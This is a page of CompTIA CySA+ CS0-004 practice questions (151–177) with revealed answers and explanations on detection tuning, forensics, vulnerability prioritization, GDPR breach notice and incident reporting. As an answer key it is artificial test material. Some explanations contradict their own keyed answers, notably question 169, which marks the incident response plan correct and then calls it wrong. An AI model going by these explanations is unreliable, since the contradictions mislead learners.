Courseiva

CompTIA CySA+ CS0-004 (CS0-004) — Questions 151–225

701 questions total · 10pages · All types, answers revealed

Page 2

Page 3 of 10

Page 4
151
MCQmedium

A security analyst is tuning a SIEM rule that triggers on any process creation event involving 'rundll32.exe'. The rule generates many false positives from legitimate software updates. Which tuning action would most effectively reduce false positives while maintaining detection of malicious use?

A.Add an exclusion list for known good command-line arguments or parent processes
B.Change the rule to trigger only on network connections from rundll32.exe
C.Disable the rule entirely
D.Increase the severity threshold of the rule
AnswerA

By implementing a baseline of authorized parent-child process relationships or whitelisting known-good command-line arguments, analysts can significantly suppress benign positive alerts. This targeted tuning preserves the SIEM's ability to detect anomalous or unauthorized executions of the binary while minimizing alert fatigue.

Why this answer

Creating an exception list for known legitimate processes or command lines that use rundll32.exe reduces false positives. However, the best approach is to modify the rule to include specific conditions such as parent process or command-line arguments that indicate malicious activity.

152
MCQmedium

A security analyst is performing static analysis on a suspicious PE file. Which initial step should the analyst take to understand the file's imports and potential capabilities?

A.Create a YARA rule based on hash characteristics.
B.Run the file in a sandbox and observe behavior.
C.Extract strings from the file.
D.Analyze the PE header and import table.
AnswerD

Examining the Portable Executable (PE) header and its Import Address Table (IAT) is a fundamental static analysis technique that reveals the specific dynamic-link libraries (DLLs) and functions the executable requests from the operating system. This structural analysis allows the analyst to infer the program's intended capabilities, such as network communication or registry modification, without executing the code.

Why this answer

Analyzing the import table reveals which Windows API functions the file uses, providing insight into its functionality (e.g., network, file, or registry operations).

153
Multi-Selecthard

During a forensic investigation, an analyst needs to acquire disk images from multiple suspect drives. Which THREE practices ensure forensic soundness? (Select THREE)

Select 3 answers
A.Documenting the chain of custody for each drive
B.Using the fastest available imaging method without verification
C.Computing and verifying hashes (e.g., SHA-256) of the original and the image
D.Using a hardware write blocker to prevent writes to the source drive
E.Acquiring the image while the system is running (live acquisition)
AnswersA, C, D

Chain of custody documentation is critical because it creates a verifiable, chronological record of every person who handled the evidence, along with the time, purpose, and condition of each transfer. In a forensic investigation, this paper trail ensures legal admissibility; if the chain is unbroken, the court can trust that the evidence has not been tampered with or substituted. Without proper documentation, even a technically perfect disk image could be ruled inadmissible, undermining the entire investigation.

Why this answer

Option A is correct because documenting the chain of custody for each drive creates an auditable record of who handled the evidence, when, and under what conditions, which is essential for the evidence to be admissible and for forensic soundness. Option C is correct because computing and verifying cryptographic hashes such as SHA-256 (or MD5) of both the original drive and the resulting image proves the image is a bit-for-bit duplicate and that no alteration occurred during acquisition. Option D is correct because a hardware write blocker enforces a read-only connection to the source drive at the hardware level, preventing any writes or metadata changes that would taint the original evidence.

Option B is not appropriate because speed without verification sacrifices integrity; forensic imaging must prioritize accuracy and validation over raw throughput. Option E is not appropriate because live acquisition alters the running system's state and memory, introduces volatility and potential contamination, and is generally reserved for situations where a dead-box acquisition is impossible.

Exam trap

CS0-004 often tests the difference between practices that ensure forensic soundness and those that compromise it; candidates may select live acquisition as a best practice when it is actually a last resort.

154
MCQeasy

A DAST scan cannot reach authenticated pages of a web application and reports only public content findings. What should be configured? For control selection, Which control best addresses the stated weakness without hiding risk?

A.Disable all application authentication
B.Treat absence of findings as proof of security
C.Reduce the scan to only the landing page
D.Authenticated scanning with a test account and session handling
AnswerD

This is the correct approach because DAST tools can be configured to simulate a legitimate user's interaction by logging in with a dedicated test account. By properly managing session tokens or cookies, the scanner gains access to protected areas of the application, allowing it to thoroughly test functionality behind authentication. This method ensures comprehensive coverage of the entire application, including pages requiring login, thereby identifying vulnerabilities that would otherwise remain hidden.

Why this answer

DAST scanners require authenticated access to crawl and test pages behind login forms. By configuring authenticated scanning with a test account and session handling (e.g., using cookies or OAuth tokens), the scanner can traverse protected routes and detect vulnerabilities such as SQL injection or XSS on authenticated pages. This directly addresses the stated weakness without masking risk.

Exam trap

CompTIA often tests the misconception that a DAST scanner's lack of findings on public pages implies the entire application is secure, when in fact the scanner never accessed the authenticated areas, so the risk remains hidden.

How to eliminate wrong answers

Option A is wrong because disabling all application authentication would remove the security control entirely, exposing the application to unauthorized access and violating security best practices. Option B is wrong because treating absence of findings as proof of security is a false sense of security; the scanner simply did not test the authenticated pages, so no conclusion about their security can be drawn. Option C is wrong because reducing the scan to only the landing page ignores the majority of the application's attack surface, leaving authenticated pages untested and vulnerabilities undiscovered.

155
MCQmedium

A security analyst reviews a vulnerability scan report and identifies a critical vulnerability with a CVSS v3.1 base score of 9.8. The attack vector is 'Network', attack complexity is 'Low', privileges required is 'None', user interaction is 'None', scope is 'Unchanged', and all three CIA impacts are 'High'. Which additional factor should the analyst prioritize when deciding whether to apply a patch or a compensating control?

A.The number of affected hosts
B.The EPSS score for the vulnerability
C.The OS type of the affected system
D.The vendor's patch release date
AnswerB

The Exploit Prediction Scoring System (EPSS) estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This data-driven metric allows analysts to prioritize high-probability threats immediately and decide whether to deploy rapid patches or implement temporary compensating controls.

Why this answer

The EPSS score estimates the likelihood of exploitation in the wild, which helps prioritize remediation. CVSS alone does not indicate active exploitation.

156
MCQeasy

A security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address on port 4444. The analyst checks the VPC Flow Logs and confirms the traffic. Which of the following is the most appropriate immediate action?

A.Create a new IAM role for the instance
B.Apply a restrictive security group to isolate the instance
C.Terminate the EC2 instance immediately
D.Update the route table to blackhole the traffic
AnswerB

Applying an isolation security group with no inbound or outbound rules immediately cuts off network communication at the hypervisor level. This effectively contains the threat and prevents further data exfiltration or command-and-control traffic while preserving the volatile memory and disk state of the EC2 instance for forensic analysis.

Why this answer

Isolating the EC2 instance by applying a restrictive security group stops the malicious communication and allows further investigation.

157
MCQmedium

An analyst is reviewing network traffic logs and notices a series of connections from an internal workstation to an external IP address on TCP port 53. The traffic consists of large DNS queries with random-looking subdomains. Which technique is most likely being used?

A.Domain generation algorithm (DGA)
B.DNS tunneling
C.Beaconing
D.HTTP smuggling
AnswerB

DNS tunneling abuses the DNS protocol by encoding non-DNS traffic, such as SSH or HTTP payloads, into the subdomains of queries sent to an attacker-controlled authoritative name server. The combination of high-volume, large-sized TXT or CNAME queries containing randomized subdomains directed to a consistent IP address is a classic signature of this exfiltration technique.

Why this answer

DNS tunneling is the technique of encoding non-DNS data (such as command-and-control instructions or exfiltrated data) inside DNS queries and responses, typically using large queries with random-looking subdomains to external authoritative servers controlled by the attacker. The use of TCP port 53 with large, high-entropy subdomains from an internal workstation to an external IP is a classic DNS tunneling signature.

Exam trap

CS0-004 often tests the confusion between DNS tunneling and DGA — both involve random-looking domains, but tunneling is about encapsulating data in DNS queries/responses, while DGA is about generating many domains for resilient C2 rendezvous.

How to eliminate wrong answers

Option A is wrong because a domain generation algorithm produces many pseudo-random domain names for malware to contact, but the traffic pattern here — large queries with encoded payloads to a single external resolver — indicates data encapsulation, not DGA domain enumeration. Option C is wrong because beaconing refers to periodic, low-volume check-ins to a C2 server; it does not inherently involve large DNS queries with random subdomains. Option D is wrong because HTTP smuggling exploits parsing discrepancies between HTTP intermediaries (e.g., CL.TE or TE.CL) and has nothing to do with DNS traffic on port 53.

158
Multi-Selectmedium

A cybersecurity analyst is preparing an incident report after a data breach. Which TWO components are essential to include? (Select TWO.)

Select 2 answers
A.Root cause
B.Timeline
C.Budget forecast
D.Employee performance review
E.Marketing analysis
AnswersA, B

Root cause analysis identifies the fundamental underlying reason for the security incident, such as an unpatched vulnerability, misconfigured firewall rule, or successful phishing campaign. For an incident report, establishing the root cause is critical because it guides remediation efforts and prevents recurrence, and it satisfies regulatory and stakeholder requirements for understanding why the incident occurred. Without a root cause, the report is merely descriptive, not prescriptive.

Why this answer

Option A (Root cause) is correct because an incident report must document the underlying vulnerability or failure that enabled the breach, such as an unpatched CVE, misconfigured firewall rule, or successful phishing vector, so remediation can prevent recurrence. Option B (Timeline) is correct because a chronological sequence of events—initial compromise, detection, containment, and eradication timestamps—establishes scope, supports forensic reconstruction, and satisfies regulatory/audit requirements. The unmarked options do not belong: budget forecast (C) is a financial planning artifact, employee performance review (D) is an HR matter, and marketing analysis (E) is unrelated to security incident documentation.

Exam trap

CS0-004 often tests whether candidates can distinguish incident-report essentials (root cause, timeline, impact, IoCs) from unrelated business artifacts like budgets or HR reviews.

159
MCQeasy

A vulnerability scan identifies a critical unauthenticated remote-code-execution flaw on an internet-facing VPN appliance that is actively exploited in the wild. Several internal-only medium vulnerabilities are also present. What should be remediated first? For validation, Which action should be taken before closing or downgrading the finding?

A.Patch or mitigate the VPN appliance immediately and verify exposure is removed
B.Start with the oldest medium vulnerability
C.Remediate only low-risk internal findings to improve closure rate
D.Defer all remediation until the monthly patch window
AnswerA

An unauthenticated critical vulnerability on an internet-facing VPN appliance represents an extremely high-risk exposure, demanding immediate attention. This scenario indicates a direct path for attackers to gain unauthorized access to the internal network without needing credentials, making it a prime target for active exploitation. Prioritizing this remediation is crucial because its internet exposure and critical impact far outweigh other findings, necessitating an emergency patch or mitigation to remove the threat immediately.

Why this answer

The critical unauthenticated remote-code-execution (RCE) vulnerability on the internet-facing VPN appliance poses an immediate and active threat, as it is being exploited in the wild. According to the CVSS scoring system and industry best practices (e.g., PCI DSS, NIST SP 800-115), vulnerabilities that are remotely exploitable, have high impact, and are actively exploited must be prioritized over internal-only medium-severity issues. Remediating this flaw first reduces the attack surface exposed to the internet and prevents potential compromise of the entire network.

Exam trap

The CS0-004 exam often tests the candidate's ability to apply risk-based prioritization over a simple 'patch oldest first' or 'close low-hanging fruit' mentality, trapping those who ignore the criticality of actively exploited, internet-facing vulnerabilities.

How to eliminate wrong answers

Option B is wrong because prioritizing the oldest medium vulnerability ignores the risk severity and exploitability; a critical RCE on an internet-facing device should always take precedence over internal medium issues, regardless of age. Option C is wrong because remediating only low-risk internal findings to improve closure rate is a metric-driven approach that neglects the most dangerous threat; this would leave a critical, actively exploited vulnerability unpatched, which could lead to a full network breach.

160
MCQmedium

After a ransomware incident, the incident report includes lessons learned. Which of the following is the BEST example of a lesson learned?

A.The ransomware encrypted 500 files.
B.The incident started at 2:00 AM.
C.The root cause was a phishing email.
D.Implement multi-factor authentication for remote access to reduce risk.
AnswerD

This is a concrete, actionable recommendation that directly addresses a common attack vector used in ransomware incidents, such as compromised VPN credentials. It specifies the control (MFA), the scope (remote access), and the goal (risk reduction), making it a proper lesson learned. Unlike observations or causes, it provides a clear implementation step that stakeholders can act on to harden their environment.

Why this answer

A lesson learned is a forward-looking recommendation that changes future posture, such as implementing MFA for remote access to reduce risk. It translates incident findings into actionable improvements. The other options are factual observations or analysis, not corrective recommendations.

Exam trap

CS0-004 often tests the difference between observations and recommendations; candidates pick root cause because it sounds analytical, but a lesson learned must be an actionable improvement.

How to eliminate wrong answers

Option A is wrong because stating that 500 files were encrypted is an impact metric, not a lesson or recommendation. Option B is wrong because the incident start time is a timeline fact, not a lesson learned. Option C is wrong because identifying the root cause is analysis; a lesson learned would be the resulting control change, such as adding email filtering or user training.

161
MCQhard

A security analyst is reviewing a vulnerability scan report that includes a plugin output with the following CVSS v3.1 vector: AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H. Which of the following best describes the characteristics of this vulnerability?

A.Easily exploitable by an unauthenticated remote attacker
B.Requires local access, high attack complexity, high privileges, and user interaction
C.Requires physical access to exploit
D.Remotely exploitable with low complexity
AnswerB

AV:L confines the attacker to the local system, AC:H means conditions outside the attacker's control must align, PR:H demands administrative-level privileges beforehand, and UI:R requires a user to interact, matching every clause of this option exactly.

Why this answer

The vector indicates local attack vector, high complexity, high privileges required, user interaction required, changed scope, and high impact on all three CIA metrics. This suggests a local privilege escalation vulnerability.

162
MCQhard

A security analyst discovers that a data breach involving personally identifiable information (PII) of European Union citizens occurred two weeks ago but was not detected until now due to a monitoring gap. The company is subject to GDPR, which requires notification to the relevant supervisory authority within 72 hours of becoming aware of the breach. The analyst reports this to the CISO, who decides to delay notification for another week to prepare a more comprehensive response. The analyst believes this violates regulatory requirements. The analyst has documented the breach details and is concerned about the legal and financial penalties for non-compliance. The company's legal department has a strong compliance focus. The analyst has a duty to escalate within the organization. The organization has a whistleblower policy and an ethics hotline. What should the analyst do?

A.Document the decision and the delay, then proceed with the notification after one week as instructed.
B.Escalate the matter to the company's legal department and explain the regulatory requirement for timely notification.
C.Report the incident to the data protection authority (DPA) immediately, bypassing the CISO, as required by GDPR.
D.Follow the CISO's orders and delay the notification.
AnswerB

Escalating the matter to the company's legal department is the most appropriate action because legal counsel is responsible for ensuring compliance with all applicable laws and regulations, including data protection mandates. This allows the legal team to assess the risk of non-compliance and advise on the correct course of action, potentially overriding the CISO's decision while respecting internal authority structures. It ensures the organization acts within legal boundaries.

Why this answer

The analyst has a duty to escalate within the organization, and the legal department is the appropriate internal authority to address compliance with GDPR's 72-hour notification requirement. By escalating to legal, the analyst ensures the regulatory obligation is formally raised without bypassing internal hierarchy, which aligns with the company's compliance focus and whistleblower policy. This approach balances the CISO's decision with the legal imperative to notify the supervisory authority within the mandated timeframe.

Exam trap

CompTIA often tests the distinction between internal escalation and external reporting, where the trap is that candidates may choose Option C (direct DPA notification) because they confuse an individual's ethical duty with the organizational process required by GDPR, but the correct action is to escalate internally first to allow the organization to fulfill its legal obligation as the data controller.

How to eliminate wrong answers

Option A is wrong because it instructs the analyst to accept a deliberate delay that violates GDPR's explicit 72-hour notification requirement, which could lead to severe penalties under Article 83(4) of the GDPR (up to 10 million EUR or 2% of annual global turnover). Option C is wrong because bypassing the CISO and reporting directly to the DPA violates the organization's internal escalation procedures and could undermine the chain of command; GDPR requires the data controller (the company) to notify, not an individual analyst acting unilaterally. Option D is wrong because blindly following the CISO's order to delay notification for a week constitutes willful non-compliance with GDPR, exposing the company to regulatory fines and the analyst to potential personal liability under Article 82.

163
Multi-Selectmedium

Which sources improve asset criticality context for vulnerability prioritization? (Choose two.)

Select 2 answers
A.CMDB or asset inventory with business service mapping
B.Random public IP reputation of unrelated hosts
C.Data classification or sensitivity labels for hosted data
D.Employee lunch preferences
AnswersA, C

A Configuration Management Database (CMDB) integrated with business service mapping allows security teams to trace a physical or virtual asset directly to the critical business processes it supports. This visibility ensures that a vulnerability on a seemingly minor server is prioritized correctly if that server hosts a dependency for a revenue-generating application.

Why this answer

A CMDB or asset inventory with business service mapping provides direct context about which assets support critical business functions, enabling prioritization of vulnerabilities based on potential business impact. This aligns with the FAIR model for risk quantification, where asset criticality is a key factor in determining the likelihood and magnitude of loss.

Exam trap

The CS0-004 exam often tests the distinction between contextual relevance (like business impact and data sensitivity) versus generic threat intelligence (like IP reputation) that lacks direct linkage to the asset's role or data value.

164
Multi-Selectmedium

A CISO wants a concise incident update during active containment. Which elements should be included? (Choose three.)

Select 3 answers
A.Every raw log line collected so far
B.Containment actions completed and pending
C.Known decisions or approvals needed
D.Current impact and affected services
AnswersB, C, D

Containment status directly satisfies the CISO's need for situational awareness during active containment, showing what isolation or blocking steps are done versus outstanding. This prevents leadership assuming the threat is fully contained when gaps remain, enabling informed decisions on resource allocation and escalation while response continues.

Why this answer

Option B is correct because a concise incident update during active containment must state which containment actions have already been completed and which remain pending, giving leadership a clear picture of the response posture and next steps. Option C is correct because surfacing known decisions or approvals needed (e.g., authorization to isolate a subnet or take a service offline) lets the CISO unblock the team quickly during time-sensitive containment. Option D is correct because current impact and affected services define the business and operational scope of the incident, which is essential for prioritization and stakeholder communication.

Option A is not appropriate because dumping every raw log line is excessive detail that defeats the purpose of a concise update; raw logs belong in the technical evidence repository, not an executive incident summary.

Exam trap

The CS0-004 exam often tests the distinction between raw data (logs) and actionable intelligence (status updates), trapping candidates who think more data is better for a concise executive update.

165
Multi-Selecthard

During a threat hunt, an analyst uses Velociraptor to collect forensic artifacts from endpoints. Which THREE of the following artifacts are most useful for detecting persistence mechanisms?

Select 3 answers
A.List of installed updates
B.Scheduled tasks
C.ARP cache
D.Service configuration
E.Registry Run keys
AnswersB, D, E

Scheduled tasks are a native Windows mechanism that can trigger a binary or script when a user logs on, at system startup, or at regular intervals. Attackers routinely create named or hidden tasks to rerun malware or maintain command-and-control, and these tasks survive a reboot (unless disabled). Because the task description, action, triggers, and run-as user are all stored in the Task Scheduler database, examining it with Velociraptor can reveal suspicious persistence. This makes scheduled tasks an essential artifact in any threat hunt.

Why this answer

Scheduled tasks (B) are a classic persistence mechanism because attackers can register a task to execute malware at logon, startup, or on a recurring schedule, and Velociraptor can enumerate them via artifacts like Windows.System.TaskScheduler. Service configuration (D) is equally relevant since creating or modifying a Windows service (e.g., with a malicious ImagePath or auto-start type) allows code to run at boot under SYSTEM privileges. Registry Run keys (E) such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run and HKCU equivalents are a well-known autostart location that malware abuses for persistence at user logon.

The list of installed updates (A) is useful for patch-level and vulnerability assessment, not for identifying persistence, and the ARP cache (C) only shows recent IP-to-MAC mappings, which is network-state data rather than a persistence indicator.

Exam trap

CS0-004 often tests the distinction between persistence artifacts and other forensic data; candidates may incorrectly select network-related artifacts like ARP cache or benign system information like installed updates, confusing general forensic value with persistence detection.

166
MCQmedium

During a vulnerability assessment, a security analyst discovers that a network device is running an outdated firmware version with known exploits. The device is critical to production and cannot be rebooted during business hours. Which of the following is the BEST approach to remediate this vulnerability?

A.Schedule the firmware upgrade during the next maintenance window
B.Apply the firmware patch immediately without rebooting
C.Implement a virtual patch via the IDS/IPS until a full patch is possible
D.Request a hotfix from the vendor that does not require a reboot
AnswerA

Scheduling the firmware upgrade during an established maintenance window is the best practice because it balances security remediation with operational continuity. Firmware updates modify low-level hardware instructions and almost always require a system reboot, which causes temporary downtime. Planning this during a scheduled window minimizes business disruption while ensuring the vulnerability is permanently resolved.

Why this answer

Scheduling the firmware upgrade during the next maintenance window aligns with change management best practices for critical production devices that cannot tolerate downtime during business hours. This approach ensures the vulnerability is remediated in a controlled manner, minimizing operational risk while still addressing the known exploit.

Exam trap

CompTIA often tests the distinction between remediation (removing the vulnerability) and mitigation (reducing risk without removal), leading candidates to mistakenly choose a compensating control like virtual patching instead of scheduling a proper firmware upgrade.

How to eliminate wrong answers

Option B is wrong because applying a firmware patch without rebooting is typically not feasible; most firmware updates require a system reboot to load the new code into memory and complete the installation. Option C is wrong because implementing a virtual patch via IDS/IPS is a compensating control that only detects or blocks exploit attempts, not a remediation that removes the underlying vulnerability. Option D is wrong because requesting a hotfix that does not require a reboot is unrealistic for firmware-level vulnerabilities; firmware updates inherently involve low-level code changes that necessitate a restart to take effect.

167
MCQmedium

During incident response, a team isolates a host but needs to preserve volatile evidence. What should be done first?

A.Capture a memory dump
B.Disconnect from the network
C.Reimage the hard drive
D.Reboot the system
AnswerA

Capturing a memory dump is the critical next step after isolating a host because it preserves volatile data residing in RAM. This data, which includes running processes, network connections, open files, and potentially malware artifacts, would be lost upon system shutdown or reboot. Analyzing a memory dump provides invaluable forensic evidence for understanding the attacker's activities and the extent of the compromise without altering the live system state.

Why this answer

When a host is isolated during incident response, the first priority is to capture volatile data before it is lost. A memory dump preserves the contents of RAM, which includes running processes, network connections, open files, and encryption keys. This data is critical for forensic analysis and disappears when the system is powered off.

Disconnecting the network (option B) is important but should follow memory capture because network activity is part of the volatile state.

Exam trap

CompTIA often tests the order of volatility (OOV) by making candidates think network isolation is the immediate priority, but the trap is that volatile memory must be captured first because network state is part of that volatile data and disconnecting the network changes the system's state before evidence is collected.

How to eliminate wrong answers

Option B is wrong because disconnecting the network should occur after capturing memory; network state (active connections, IP addresses, ports) is volatile and would be lost if the network cable is pulled first. Option C is wrong because reimaging the hard drive destroys all evidence, including non-volatile data, and is a recovery step, not a preservation step. Option D is wrong because rebooting the system clears RAM, destroying the very volatile evidence you need to preserve, and may trigger anti-forensic mechanisms.

168
MCQhard

During a cloud security investigation, an analyst notices that an AWS IAM user generated multiple 'CreateKeyPair' API calls from an IP address outside the corporate network. Which AWS service is best suited to detect this type of anomalous behavior?

A.AWS CloudTrail
B.AWS Config
C.AWS GuardDuty
D.AWS Inspector
AnswerC

AWS GuardDuty is a continuous security monitoring service that actively analyzes CloudTrail management events, VPC flow logs, and DNS query logs using threat intelligence and machine learning. It is specifically engineered to detect anomalous API operations, credential compromise, and malicious activity within an AWS environment, generating actionable security findings.

Why this answer

AWS GuardDuty uses machine learning and threat intelligence to detect anomalous API activity, including unauthorized key creation, via CloudTrail logs.

169
MCQmedium

After a major security incident, a post-incident review reveals that communication between the SOC and the network operations center (NOC) was slow and unclear. Which document should be updated to improve future incident response?

A.Disaster recovery plan (DRP)
B.Communication management plan
C.Business continuity plan (BCP)
D.Incident response plan (IRP)
AnswerD

The Incident Response Plan (IRP) provides a structured approach for an organization to prepare for, detect, contain, eradicate, recover from, and post-incident review security incidents. While an IRP will include steps for notifying relevant parties and escalating issues, its core focus is on the technical and procedural actions required to mitigate the incident itself. It details the technical steps for analysis and remediation, rather than the overarching strategic framework for stakeholder communication.

Why this answer

The Incident Response Plan (IRP) is the primary document that outlines the phases of incident response, including the communication pathways, escalation procedures, and coordination protocols between internal teams (such as the SOC and NOC) and external stakeholders. When a post-incident review (lessons learned) identifies communication delays and lack of clarity between teams, the IRP must be updated to define clearer communication channels and responsibilities for future incidents.

Exam trap

CompTIA often tests your ability to identify the correct security-specific document. Do not be distracted by project management terms like 'Communication management plan' just because the question mentions a communication failure. Communication protocols, escalation paths, and contact lists for security incidents are defined within the Incident Response Plan (IRP) or its associated playbooks.

How to eliminate wrong answers

Option A is wrong because the disaster recovery plan (DRP) focuses on restoring IT infrastructure and systems after a disaster (e.g., data center outage), not on improving real-time communication workflows between operational teams during a security incident. Option C is wrong because the business continuity plan (BCP) ensures critical business functions continue during a disruption (e.g., alternate site operations), but does not address the specific communication breakdown between SOC and NOC. Option D is wrong because the incident response plan (IRP) outlines technical steps for detecting, containing, and eradicating threats (e.g., playbooks, containment procedures), but it does not typically detail inter-team communication protocols; that is the role of the communication management plan.

170
MCQhard

A security analyst is reviewing the output of a vulnerability scan and notices that a critical vulnerability on a Linux server has been reported as 'Confirmed' by the scanner. The analyst checks the system and finds that the actual vulnerability does not exist because a kernel upgrade was applied via a yum update but the scanner did not detect the change. Which of the following is the MOST likely cause?

A.The vulnerability database was not updated before the scan
B.The scanner is configured to alert on missing patches only
C.The scanner was not configured with proper credentials for authenticated scanning
D.The scanner's plugins for Linux are outdated
AnswerC

Without proper credentials, a vulnerability scanner performs unauthenticated scans, relying on network-level probes and banner grabbing. This method often leads to false positives because it cannot log into the target system to verify actual patch levels, installed software versions, or configuration files. For example, a service banner might display an older version string even if the underlying software has been patched or backported, causing the scanner to incorrectly flag a vulnerability as "Confirmed" on a secure system.

Why this answer

The vulnerability scanner reported a 'Confirmed' critical vulnerability that no longer exists after a kernel upgrade via yum. This indicates the scanner performed an unauthenticated scan, relying on banner grabbing or service version detection, which cannot verify the actual installed kernel version. With proper credentials (e.g., SSH keys or a service account), the scanner would have performed an authenticated scan, queried the package manager (rpm -q kernel), and correctly identified that the kernel was updated, thus not flagging the vulnerability.

Exam trap

CompTIA often tests the distinction between authenticated and unauthenticated scanning, and the trap here is that candidates assume a 'Confirmed' status means the scanner has verified the vulnerability through deep inspection, when in fact it may only indicate that the scanner's unauthenticated checks matched a signature, not that it has actual system-level access to confirm the patch state.

How to eliminate wrong answers

Option A is wrong because the vulnerability database being outdated would cause the scanner to miss new vulnerabilities or report false negatives, not to falsely confirm a vulnerability that was already patched. Option B is wrong because the scanner is configured to alert on missing patches only; this would mean it only reports vulnerabilities when patches are absent, but here the patch was applied, so the scanner should not have alerted at all. Option D is wrong because outdated plugins for Linux would likely cause the scanner to miss vulnerabilities or report incorrect severity, but the core issue is the lack of authenticated access to verify the kernel version, not the plugin version.

171
MCQeasy

A security analyst is configuring a container image scanning tool. Which of the following tools is specifically designed for container image vulnerability scanning?

A.Nessus
B.Burp Suite
C.OpenVAS
D.Trivy
AnswerD

Trivy is a highly specialized, open-source vulnerability and misconfiguration scanner designed specifically for containers and other cloud-native targets. It excels at scanning container images, Git repositories, and Kubernetes configurations to detect OS package vulnerabilities and application dependency flaws directly within CI/CD pipelines.

Why this answer

Trivy is an open-source, purpose-built vulnerability scanner for container images, filesystems, and Git repositories. It scans OS packages (e.g., Alpine apk, Debian dpkg) and language-specific dependencies (npm, pip, Maven) inside an image and reports CVEs with severity ratings. Unlike general-purpose scanners, Trivy understands image layers and package manifests, making it the tool specifically designed for container image scanning in this list.

Exam trap

CS0-004 often tests the confusion between general-purpose vulnerability scanners (Nessus, OpenVAS) and specialized container image scanners (Trivy), so candidates must recognize that container scanning requires tools that understand image layers and package manifests.

How to eliminate wrong answers

Option A is wrong because Nessus is a general-purpose network and host vulnerability scanner that targets IP addresses and services, not container image layers or package manifests. Option B is wrong because Burp Suite is a web application security testing proxy focused on HTTP/HTTPS traffic and web vulnerabilities, not container image scanning. Option C is wrong because OpenVAS (now Greenbone Vulnerability Management) is a network vulnerability scanner similar to Nessus, designed for hosts and network services, not for inspecting container images.

172
Multi-Selecthard

An organization has experienced a data breach involving personal information of EU residents. The incident response team is preparing communications. Which THREE of the following are mandatory actions under GDPR? (Select THREE.)

Select 3 answers
A.Notify all affected data subjects without undue delay if high risk
B.Document the breach and remediation actions
C.Publish a public notice in the local newspaper
D.Notify law enforcement within 24 hours
E.Notify the supervisory authority within 72 hours
AnswersA, B, E

GDPR Article 34 mandates that data controllers must notify affected data subjects without undue delay when a personal data breach is likely to result in a high risk to their rights and freedoms. This direct communication enables individuals to take necessary precautions to mitigate potential harm, such as identity theft or financial fraud. The 'without undue delay' clause emphasizes the urgency of informing those directly impacted by the breach.

Why this answer

GDPR requires notification to the supervisory authority within 72 hours, documentation of the breach, and notification to affected individuals if high risk.

173
MCQeasy

A vulnerability management team is prioritizing remediation of a list of vulnerabilities. They want to incorporate the likelihood of exploitation based on real-world exploit activity. Which of the following data sources should they use?

A.CVE
B.CVSS
C.KEV
D.EPSS
AnswerD

The Exploit Prediction Scoring System (EPSS) is a data-driven model that estimates the probability, ranging from 0 to 1, that a software vulnerability will be exploited in the wild within the next 30 days. By combining real-world threat intelligence with machine learning, EPSS allows security analysts to prioritize remediation efforts based on actual threat likelihood rather than theoretical severity alone.

Why this answer

The Exploit Prediction Scoring System (EPSS) uses real-world exploit data to predict the likelihood of exploitation. KEV lists known exploited vulnerabilities but is not a scoring system. CVSS and CVE are not probabilistic.

174
Multi-Selectmedium

A security analyst is preparing a compliance report for an upcoming audit. The auditor has requested evidence of access controls. Which TWO of the following would provide appropriate evidence? (Select TWO.)

Select 2 answers
A.Recent access review reports
B.A network topology diagram
C.User account audit logs showing privilege changes
D.A list of all employees
E.The company's password policy
AnswersA, C

Access review reports are a direct artifact of an identity governance process, showing that the organization periodically re-certifies user entitlements against current roles and business need. Because the reports are generated from actual access decisions and reviews, they demonstrate that the access-control control is operating as intended, which is exactly the type of evidence a compliance auditor expects to see.

Why this answer

Option A (Recent access review reports) is correct because access reviews document the periodic recertification of user permissions, directly demonstrating that access controls are being enforced and validated, which is exactly the type of evidence an auditor seeks for access control compliance. Option C (User account audit logs showing privilege changes) is correct because audit logs provide a verifiable, timestamped record of when privileges were granted, modified, or revoked, serving as concrete technical evidence that access control mechanisms are functioning. Option B (A network topology diagram) is not correct because it illustrates infrastructure layout and data flows, not access control enforcement or user permissions.

Option D (A list of all employees) is not correct because it merely enumerates personnel and does not show how access is granted, restricted, or reviewed. Option E (The company's password policy) is not correct because a policy is a documented intent or requirement, not evidence that access controls are actually implemented or operating effectively.

Exam trap

CS0-004 often tests the difference between policy/design documents (which describe intent) and operational evidence (which proves controls actually ran) — candidates pick the password policy because it sounds security-relevant but it is not audit evidence of access control.

175
MCQhard

A security analyst is performing dynamic analysis of a suspicious file in a sandbox. Which of the following observations is most indicative of ransomware behavior?

A.The file injects code into a legitimate process
B.The file opens and overwrites documents with a new extension and drops a ransom note
C.The file creates a registry run key
D.The file attempts to connect to multiple external IPs
AnswerB

This behavior represents the definitive, high-fidelity signature of ransomware during dynamic analysis. The rapid opening, cryptographic overwriting of user data, appending of a unique file extension, and subsequent creation of a text or HTML ransom note uniquely identify the payload's destructive intent to extort the victim.

Why this answer

Ransomware typically encrypts files and renames them with a new extension. Dropping a ransom note and leaving encrypted files is characteristic.

176
MCQhard

A cybersecurity analyst is configuring a vulnerability scanning policy for a mixed environment of Linux servers and Windows workstations. The analyst wants to minimize disruption to production services while ensuring comprehensive coverage. Which approach is BEST?

A.Deploy agents on all systems to perform continuous scanning
B.Scan all systems simultaneously with minimal plugin set to avoid performance issues
C.Use separate scan windows for Linux servers and Windows workstations with appropriate credentials and performance tuning
D.Schedule a single scan of all systems using default credentials and aggressive plugin settings
AnswerC

Segmenting scans by operating system allows the analyst to apply targeted credentials, which enables deep, authenticated configuration audits without generating excessive network noise. Implementing distinct scan windows and performance tuning prevents resource exhaustion on production servers and ensures that workstation scans do not disrupt business operations.

Why this answer

Using separate scan windows and credentials for each OS type minimizes disruption by scanning similar systems together and reduces load, while tailored credential profiles improve scan accuracy.

177
MCQhard

You are a senior security analyst at a mid-sized financial company. The SOC has been alerted by the EDR system about anomalous behavior on a domain controller (DC) that runs Windows Server 2019. The alert indicates that a process named 'svchost.exe' spawned a PowerShell process that executed a one-liner to connect to an external IP address (203.0.113.5) over TCP port 443. Further investigation shows that the DC's event logs have gaps of about 10 minutes each, and the local administrator account 'Administrator' was used to log in from a workstation named 'WKSTN-FIN-12' at the time of the event. The company has strict policies: all administrative access must be via dedicated jump hosts, and privileged accounts are monitored. Upon checking, 'WKSTN-FIN-12' is assigned to an employee in the finance department who has no administrative privileges. The employee reports that they did not log in recently. The CISO wants a swift containment and eradication without losing forensic evidence. Based on this scenario, which of the following is the BEST first course of action?

A.Isolate the domain controller from the network by disabling its network interface.
